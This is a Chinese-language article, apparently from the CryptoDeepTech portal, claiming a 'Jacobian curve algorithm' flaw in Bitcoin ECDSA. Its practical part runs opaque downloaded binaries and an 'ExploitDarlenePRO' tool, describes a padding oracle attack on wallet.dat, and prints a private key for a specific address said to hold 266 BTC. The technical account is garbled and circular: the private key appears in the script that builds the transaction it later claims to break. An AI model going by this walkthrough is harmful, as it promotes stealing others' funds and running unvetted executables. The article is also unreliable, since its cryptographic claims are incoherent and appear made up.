
在本文中,我們將研究與雅可比曲線實施相關的漏洞範例。近年來,比特幣等加密貨幣已成為金融生態系統的重要組成部分。然而,隨著它們的普及,網路安全威脅的數量也在增加。其中一個威脅是雅可比曲線演算法漏洞,它影響橢圓曲線數位簽章演算法 (ECDSA)。該漏洞允許攻擊者產生偽造的簽名,這可能會對用戶和比特幣網路的完整性造成嚴重後果。
雅可比曲線演算法漏洞是指橢圓曲線密碼學實作中的缺陷,特別是影響 ECDSA。攻擊者可以操縱橢圓曲線計算中使用的雅可比座標的數學屬性,這使他們能夠利用偽造的簽名創建欺詐性交易,而雅可比曲線演算法漏洞與 ECDSA 中使用的橢圓曲線加密實現中的缺陷相關。此漏洞允許攻擊者操縱用於產生數位簽章的雅可比座標的數學屬性。由於此類操縱,攻擊者可以使用虛假簽名創建詐欺交易,這些交易將被比特幣系統視為有效。
此漏洞發生在資料反序列化過程中,可用於注入惡意程式碼並建立虛假簽章。如果資料處理不正確,攻擊者就能夠偽造 ECDSA 簽名,從而危及比特幣系統的完整性。
潛在後果
與此漏洞相關的主要威脅是未經授權存取用戶資金的可能性。攻擊者可以使用偽造的簽名來創建交易,將比特幣從毫無戒心的用戶錢包轉移到自己的帳戶。這不僅會破壞對系統的信任,還會為用戶帶來重大的經濟損失。偽造的簽名允許攻擊者將資金從受害者的錢包轉移到自己的帳戶。此外,此類攻擊可能會損害區塊鏈的完整性,造成雙重支出的威脅並破壞系統的基本原則。
拒絕服務 (DoS) 攻擊和機密資訊(包括使用者私鑰)的洩漏。
如果比特幣網路上的某些節點受到損害,這可能會導致區塊鏈分叉成不相容的鏈,從而造成混亂和潛在的雙重支出問題。此外,攻擊者還可以利用此漏洞發動拒絕服務 (DoS) 攻擊,使網路充滿無效事務,從而導致合法使用者無法存取。
成功利用此漏洞也可能導致比特幣網路的共識狀態不匹配,從而導致區塊鏈分裂成不相容的分支。因此,可能會發生拒絕服務 (DoS)攻擊和機密資訊(包括使用者私鑰)的洩漏。
利用機制和對多重簽章的影響
雅可比曲線演算法漏洞對於使用多重簽名方案的系統尤其危險,其中需要來自不同參與者的多個簽名才能完成交易。攻擊者可以產生系統接受的虛假簽名,這不僅會危及單一交易,還會危及使用多重簽名的整個過程。
我們了解到,如果用戶輸入未經正確驗證,可能會導致比特幣系統嚴重中斷,攻擊者可以抓住機會注入惡意程式碼,並最終透過在比特幣交易上創建偽造簽名來操縱系統。
實用部分
從雅可比曲線演算法漏洞理論可知,攻擊者可以利用該漏洞進行DoS攻擊,透過無效交易使網路過載,從而破壞比特幣網路的穩定性。讓我們繼續本文的實際部分,看一個使用比特幣錢包的範例:15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2,其中遺失的代幣數量為: 2024 年 8 月的266.03138481 BTC,該金額為:15747705746 USD

教學 Power AI
讓我們使用「教程 Power AI」中的清單-一種廣泛使用的人工智慧類別,用於介紹密碼分析和密碼學各個領域的業務。
安裝命令:
git clone https://github.com/demining/Tutorials-Power-AI.git
cd Tutorials-Power-AI/
python3 tutorials.py


BitcoinChatGPT是一款創新人工智慧聊天機器人,可協助用戶發現比特幣交易中的漏洞。 BitcoinChatGPT 的優點和分類使您可以檢查您的比特幣地址是否存在針對加密錢包的各種攻擊方案。基於密碼分析的機器學習使我們能夠充分探索對比特幣生態系統中使用的演算法的各種攻擊。從比特幣錢包分類帳中提取私鑰的工具廣泛流行,BitcoinChatGPT 是網路安全的重要且有用的資源。
讓我們利用雅可比曲線漏洞透過 BitcoinChatGPT 機器學習流程創建原始交易
讓我們考慮建立使用BitcoinChatGPT模組的易受攻擊的原始交易的結構
我們打開Google Colab版本:
State of a vulnerable transaction in Bitcoin:
01000000
....01
........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935
............00000000
........8a473044
....0220
......................1c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f5240
....0220
........7ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606
.....014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e
....ffffffff
01
....d204000000000000
........1976
............a914
........334a75f1d3bbefa5b761e5fa53e60bce2a822879
....88ac
00000000
讓我們將所有輸出值合併到一條公共線中:
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000

解碼易受攻擊的原始比特幣交易後,我們得到結果:
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK",
"15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2"
],
"block_height": -1,
"block_index": -1,
"confirmations": 0,
"double_spend": false,
"fees": 2606688996428,
"hash": "e88bcb98a9352f5f936ce92acfc1fb98f6cf1aedf8a985ea67c63961c108a149",
"inputs": [
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK"
],
"age": 344419,
"output_index": 0,
"output_value": 2606688997662,
"prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d",
.......
.......
.......
關於比特幣 HASH160 的註解:334a75f1d3bbefa5b761e5fa53e60bce2a822879

交易腳本
上面的腳本已經解碼
HASH
BitcoinChatGPT 使用公鑰建立交易結構,我們可以看到比特幣地址: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2發送1234 satoshi
到其網路內的相同地址。

比特幣HASH160是使用Python腳本獲得的:wif_to_hash160.py


問題-答案:



最終,BitcoinChatGPT模組輸出對檔案的回應:KEYFOUND.privkey ,以兩種最常用的格式HEX 和 WIF儲存私鑰

BitcoinChatGPT №4 雅可比曲線漏洞演算法
脆弱的 原始 交易
讓我們使用 廣播比特幣交易儲存庫從接收到的資料創建一個易受攻擊的原始交易
下載並安裝原始程式碼,打開終端機並執行命令:
git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.git
目錄:
cd Broadcast-Bitcoin-Transaction
讓我們安裝三個重要的函式庫:

讓我們運行命令:
pip install -r requirements.txt
讓我們在Notepad ++中開啟主檔案並對 Python 腳本程式碼進行一些小的更改:main.py
from io import BytesIO
from secp256k1 import *
from sighash import *
pk = PrivateKey.parse("5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP")
pk.address()
tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d")
index = 0
send = "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2"
tx_in = TxIn(tx, index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 2345
tx_ins = [ tx_in ]
tx_outs = [
TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()
print(tx.serialize().hex())
f = open("RawTX.txt", 'w')
f.write("" + tx.serialize().hex() + "" + "\n")
f.close()
讓我們運行命令:
python main.py
我們開啟目錄中的RawTX檔:
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000
影片中的動作順序:
從BitcoinChatGPT模組的及時回應中我們得知,雅可比曲線漏洞演算法可以用來解決複雜的密碼學問題。
智慧型變壓器
讓我們應用機器學習智慧變壓器,將筆記本Google Colab
與Pytorch、TensorFlow、JAX集成,並使用從易受攻擊的原始交易接收的資料進行比特幣地址:15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2我們將從SMART_IDENTIFY一個不受保護的檔案wallet.dat。然後,我們將對新建立的檔案wallet.dat執行Padding Oracle Attack,將密碼解密為原始二進位格式,以便使用標準命令從Bitcoin Core軟體控制台取得並提取私鑰:dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
讓我們使用以下連結開啟一個新的Google Colab筆記本:
!git clone https://github.com/smartiden/Smart-Transformers.git
cd Smart-Transformers/

讓我們安裝所有必需的套件和庫:
!sudo apt-get update
!sudo apt install libtool
!sudo apt-get install g++
!sudo apt-get install libgmp3-dev libmpfr-dev
!chmod +x Generic_Algorithms
!./Generic_Algorithms
!pip3 install transformers
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "microsoft/DialoGPT-medium"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
model = model.cpu()


團隊:
ls -S

讓我們將易受攻擊的原始交易新增至文字文件:RawTX.txt,為此我們將使用該實用程式echo
讓我們運行命令:
!echo '01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000' > RawTX.txt
!cat RawTX.txt

現在,為了獲得密碼分析的準確演算法和方法,我們需要使用SMART_IDENTIFY實用程式來識別存在漏洞的RawTX。
讓我們運行命令:
!./SMART_IDENTIFY
結果,我們得到了Jacobian_Curve_Algorithm方法,在早期研究中, BitcoinChatGPT模組辨識出了同樣的事情。
#################################################
Jacobian_Curve_Algorithm
#################################################

我們開啟目錄:

讓我們開始建立wallet.dat檔案的過程,為此,我們使用檔案中易受攻擊的原始交易的已識別資料: RawTX.txt,用於我們使用Jacobian_Curve_Algorithm實用程式的過程
讓我們運行命令:
!./Jacobian_Curve_Algorithm -o RawTX.txt -s wallet.dat


我們打開左側面板中的目錄
Google Colab
,看到檔案:wallet.dat
建立成功!


下載並安裝比特幣核心 0.18.0 https://bitcoincore.org/bin/bitcoin-core-0.18.0
讓我們打開控制台並運行命令:
getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

我們看到檔案:wallet.dat屬於比特幣地址:15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
檔案:wallet.dat 已使用密碼加密!

讓我們運行命令來檢查私鑰:
dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

我們看到一則警告:錯誤:請先使用 walletpassphrase 輸入錢包密碼。 (代碼-13)
填充預言機攻擊


讓我們對 Wallet.dat使用 Padding Oracle Attack 方法並解密密碼以存取二進位密碼格式。


首先我們造訪wallet.dat文件,金額為:266.03 BTC
存儲庫克隆:最大的丟失比特幣錢包列表
git clone https://github.com/smartiden/Biggest-Lost-Bitcoin-Wallets-List.git

總司令




下載並安裝 比特幣核心0.18.0


路徑:c:\Users\User\AppData\Roaming\Bitcoin\

讓我們移動檔案: wallet.dat

c:\Users\User\AppData\Roaming\Bitcoin\wallet.d位於

讓我們啟動比特幣核心錢包

加密錢包…

我們打開控制台
getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

{
"address": "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2",
"scriptPubKey": "76a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac",
"ismine": true,
"solvable": true,
"desc": "pkh([334a75f1]04603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e)#lrxwcu6z",
"iswatchonly": false,
"isscript": false,
"iswitness": false,
"pubkey": "04603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e",
"iscompressed": false,
"label": "",
"ischange": false,
"timestamp": 1,
"labels": [
{
"name": "",
"purpose": "receive"
}
]
}
比特幣地址資訊:
餘額:266.03138481 比特幣

Metasploit 框架和使用 MSFVenom

Metasploit框架在msfvenom開發中的作用
msfvenom是一個結合了之前的兩個工具創建的工具:
msfpayload
和msfencode
。它允許使用者為不同平台和編碼器建立有效負載,並且還提供自訂有效負載參數的能力。 msfvenom 支援多種輸出格式,包括可執行檔、腳本,甚至是 Web 應用程式程式碼。Metasploit 框架 在 msfvenom 開發中發揮關鍵作用,原因如下:
1. 漏洞利用整合:msfvenom 允許使用者建立可與 Metasploit 漏洞一起使用的有效負載。這簡化了滲透測試過程,因為使用者可以快速產生與特定漏洞相符的有效負載。
2. 多功能性:憑藉對多種格式和平台的支持,msfvenom 已成為多功能的有效負載創建工具。這使得安全專業人員能夠根據不同的系統和環境自訂他們的攻擊。
3. 更新與支援:Metasploit Framework 不斷更新,這讓您可以讓 msfvenom 保持最新且有效。 Metasploit 中的新功能和改進直接影響 msfvenom 的功能,使其更加強大和靈活。
4. 教育與研究:Metasploit 和 msfvenom 是網路安全教育和研究的重要工具。它們允許學生和安全專業人員在安全的環境中學習漏洞和利用技術。

運行ExploitDalenePRO.exe


15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

c:\BitcoinTools\ExploitDalenePRO\modules\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\decode_core.rb

解碼核心.rb


c:\BitcoinTools\ExploitDalenePRO\bitcoin\

https://github.com/bitcoin/bitcoin

https://github.com/bitcoin/bitcoin/blob/master/src/crypto/aes.h

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\Users\User\AppData\Roaming\Bitcoin\

上傳錢包.dat


結果.json

walletpassphrase 1111010100000111010101011110110010011000010000001111001001010011010011110110010010010000000111101010111011101010001010100000011011001001111111110111000011010011101110101010101101101111001011100100101100011000111010011000101001001100011010001100110111111111 60
運行命令並獲取私鑰
比特幣核心中的 dumpprivkey 指令
該
dumpprivkey
命令是 Bitcoin Core 錢包命令列介面 (CLI) 中使用的命令,用於匯出與特定比特幣位址關聯的私鑰。該指令的語法如下:“
dumpprivkey “address” “
其中「地址」是您想要接收私鑰的比特幣地址。
dumpprivkey 指令的工作原理
當您鍵入
dumpprivkey
命令時,Bitcoin Core 在其錢包中尋找指定的位址,如果您找到,則傳回WIF 格式的相應私鑰。這允許用戶將私鑰儲存在安全的地方或將其匯入到另一個錢包中。
dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

私鑰資訊:
5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP

比特幣地址資訊:
餘額:266.03138481 比特幣

https://www.coinbase.com/converter/btc/usd

!pip3 install bitcoin

讓我們運行 程式碼 來檢查比特幣地址的合規性:

__________________________________________________
Private Key WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP
Bitcoin Address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
total_received = 266.03138481 Bitcoin
__________________________________________________
這是正確的!私鑰對應比特幣錢包。
讓我們打開 bitaddress 並檢查:
ADDR: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP
HEX: C5FBD161D334BA9BBC199BD9A427F05A46AACFABFBB3BC1BFF9D227E418D76D9

結論及緩解措施:
為了防範與雅可比曲線漏洞相關的威脅,使用者應採取以下步驟:
- 軟體更新:定期將加密貨幣錢包更新到可解決漏洞的版本對於安全性至關重要。
- 改進的簽章驗證機制:加強輸入驗證和錯誤處理將有助於防止建立偽造簽章並保護使用者的私鑰。
- 監控網路活動:不斷分析網路狀態並在早期階段識別可疑交易,使您能夠快速回應利用漏洞的嘗試。
- 使用多重身份驗證:引入額外的加密保護方法將顯著提高安全性。
為了防止與雅可比曲線漏洞相關的可能攻擊,強烈建議比特幣用戶將其錢包軟體更新到解決此漏洞的最新版本。定期軟體更新、異常檢測系統的實施以及提高用戶對可能威脅的認識將有助於維護加密貨幣系統的完整性和安全性。
雅可比曲線演算法漏洞對加密貨幣交易的安全性和區塊鏈的完整性構成重大威脅。為了最大限度地降低風險,使用者應定期更新軟體,實施嚴格的安全措施,並持續監控網路健康狀況。這些措施將有助於維護加密貨幣系統的安全性和穩定性,保護用戶免受潛在威脅和財務損失。
參考:
- 曲線阿貝爾變種的雅可比行列式:2003 年 10 月 10 日由 W. Stein 撰寫的筆記
- 特殊奇異曲線的雅可比行列式KUBRA NARI 和 ENVER OZDEMIR
- 特徵域上超橢圓曲線的雅可比變換p > 2 NORIKO YUI 收到 1977 年 10 月 15 日
- Genus 2 曲線上的雅可比座標Huseyin Hisil 和 Craig Costello Yasar 大學,土耳其伊茲密爾
- 哈佛大學 麻薩諸塞州劍橋 1999 年 4月
- 奇異葉狀結構的雅可比曲線Nuria Corral 文章將於 2024 年 7 月 3 日線上發布。
- 雅可比曲線簇的附加演算法(適用於公鑰密碼系統)S. ARITA、S. MIURA 和 T. Sekiguchi
- 任意地場上屬 2 曲線的雅可比群和形式群EV Flynn,牛津大學數學研究所
- 關於雅可比變異體中的曲線屬VALERIA ORNELLA MARCUCCI 數學學科分類 (2010)
- 曲線與雅可比的局部算術P. Allen、F. Calegari、A. Caraiani、T. Gee、D. Helm、B. Le Hung、J. Newton、S. Scholze、R. Taylor 和J. Thorne,潛在自同構
- 節點曲線的壓縮雅可比行列式Lucia Caporaso 在 Istituto Sup 上提供的迷你課程的擴展筆記
- 關於雅可比 Compositio Mathematica 中曲線的註釋,tome 88,no 3 (1993)
- 代數曲線雅可比行列式的算術Giulio Di Piazza Damien Robert
- 從曲線到雅可比行列式再返回Christophe Ritzenthaler 蒙特利爾 CNRS 盧米尼數學研究所
- 廣義雅可比行列式 I Caleb Ji 代數幾何背景
- 超橢圓曲線及其雅克比本傑明史密斯同源學派,在線,2021 Inria + École polytechnique,法國
- 普通複曲面的雅可比曲線Fran¸coise Michel 數學學科分類 2000
- 黎曼曲面的雅可比式DONU ARAPURA Arapura、黎曼不等式和 Riemann-Roch
- 一條曲線及其抽像牛津大學 Jacobian Boris Zilber 2012 年 8 月 22 日
- 屬一曲線的雅可比行列式Sang Yook An 和 Seog Young Kim 亞利桑那大學
- 雅可比曲線座標創建者:T. Madas
- 二維雅可比猜想的幾何方法 亞歷山大·鮑里索夫
- 雅可比矩陣JS Milne 六月 12, 2021
- 曲線局部算術和雅可比數學與統計學院,格拉斯哥大學,大學廣場,格拉斯哥
- 關於雅可比簇的註釋:簡短調查Juliana Coelho (UFF) 2017 年 3 月 28 日
- 屬 3 Andrew V. Sutherland超橢圓曲線的快速雅可比演算法
- 雅可比行列式轉換第十三屆演算法數論研討會論文集
- 代數幾何研討會:「曲線雅可比」主辦單位:Peter Scholze、Johannes Anschutz
- 超橢圓曲線的雅可比方程式Paul Van Wamelen
- ECC與雅可比橢圓曲線密碼學的比較研究Anagha P. Zele, Avinash P. Wadhe
- 模曲線的雅可比矩陣: EMMANUEL KOWALSKI 的
- 雅可比行列式中的空間填充曲線Autor Thijs Limbeek 主管 Prof.博士。本·穆南博士阿恩‧斯梅茨 2020 年 11 月 24 日
本資料是為 CRYPTO DEEP TECH入口網站創建的 ,旨在確保資料和橢圓曲線加密 secp256k1的財務安全 ,防止 比特幣加密貨幣 中的 弱ECDSA簽章。該軟體的創建者不對材料的使用負責。
電報:https://t.me/cryptodeeptech
影片素材:https://youtu.be/qf6u85wGwNw
影片教學:https://dzen.ru/video/watch/66119078be267c07401d9e4c
來源:https://cryptodeep.ru/jacobian-curve-algorithm-vulnerability
